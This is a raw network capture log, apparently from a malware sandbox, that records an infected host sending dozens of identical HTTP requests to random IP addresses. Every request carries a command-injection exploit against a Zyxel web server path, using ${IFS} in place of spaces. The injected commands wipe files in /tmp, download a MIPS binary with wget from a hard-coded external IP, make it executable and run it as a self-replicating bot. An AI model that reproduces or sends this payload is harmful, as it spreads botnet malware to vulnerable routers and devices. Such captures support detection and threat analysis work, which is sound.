                                        Jan 14, 2024 16:18:55.709558010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7251192.168.2.135675843.130.247.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.709587097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7252192.168.2.134790078.104.75.125443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.709640026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7253192.168.2.1338782195.83.179.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.709671021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7254192.168.2.134032059.29.154.151443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.709700108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7255192.168.2.1337696171.245.127.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.709738970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7256192.168.2.135897675.72.39.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.709786892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7257192.168.2.1337652128.157.134.0443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.709815979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7258192.168.2.135329280.186.95.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.709839106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7259192.168.2.1360076114.97.193.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.709897995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7260192.168.2.1348432145.79.112.30443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.709933043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7261192.168.2.134663286.229.90.114443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.709986925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7262192.168.2.135731864.206.113.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.710032940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7263192.168.2.1349728180.99.241.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.710052967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7264192.168.2.1335480193.33.54.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.710102081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7265192.168.2.134362448.210.177.61443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.710155010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7266192.168.2.135703888.155.216.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.710196972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7267192.168.2.1333084108.178.44.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.710227966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7268192.168.2.1353768204.101.184.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.710270882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7269192.168.2.1336938117.131.235.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.710297108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7270192.168.2.1347542179.139.38.122443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.710349083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7271192.168.2.133539262.62.209.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.710395098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7272192.168.2.1357806192.212.107.110443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.710429907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7273192.168.2.1359316195.161.148.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.710458994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7274192.168.2.1354772113.232.105.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.710513115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7275192.168.2.1356610221.84.248.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.710553885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7276192.168.2.135963283.53.248.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.710586071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7277192.168.2.134441417.154.61.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.710640907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7278192.168.2.1352690103.23.103.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.710678101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7279192.168.2.1353878135.45.252.0443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.710726976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7280192.168.2.1339760206.143.201.233443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.710768938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7281192.168.2.1354530173.16.52.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.710817099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7282192.168.2.1344802143.143.4.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.710850000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7283192.168.2.1333230107.222.252.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.710871935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7284192.168.2.1343248133.38.151.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.710923910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7285192.168.2.1341142196.116.83.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.710958004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7286192.168.2.1332856172.233.224.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.710999966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7287192.168.2.1341468211.4.181.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.711035013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7288192.168.2.1343456211.163.189.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.711066961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7289192.168.2.1341694157.150.110.97443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.711103916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7290192.168.2.13341008.180.50.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.711136103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7291192.168.2.134131468.171.71.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.711180925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7292192.168.2.134492473.180.57.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.711237907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7293192.168.2.133983882.39.161.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.711266994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7294192.168.2.1338074148.54.220.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.711313009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7295192.168.2.1351884134.157.177.79443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.711330891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7296192.168.2.1342584153.172.212.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.711396933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7297192.168.2.1334954130.185.31.105443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.711419106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7298192.168.2.134651023.173.184.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.711482048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7299192.168.2.133368812.23.220.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.711565018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7300192.168.2.133918877.233.64.30443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.711594105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7301192.168.2.1337500172.234.77.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.711610079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7302192.168.2.1342532213.235.206.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.711656094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7303192.168.2.1337502164.114.135.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.711694956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7304192.168.2.134476266.27.82.156443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.711744070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7305192.168.2.133978279.174.77.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.711788893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7306192.168.2.1333922157.118.252.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.711822987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7307192.168.2.134581642.185.93.71443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.711875916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7308192.168.2.1339760199.241.40.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.711916924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7309192.168.2.135101624.221.10.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.711950064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7310192.168.2.133330836.20.248.71443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.711977959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7311192.168.2.1347348141.216.122.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.712014914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7312192.168.2.134802088.187.207.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.712043047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7313192.168.2.1351342124.123.3.149443
                                        TimestampBytes transferredDirectionData
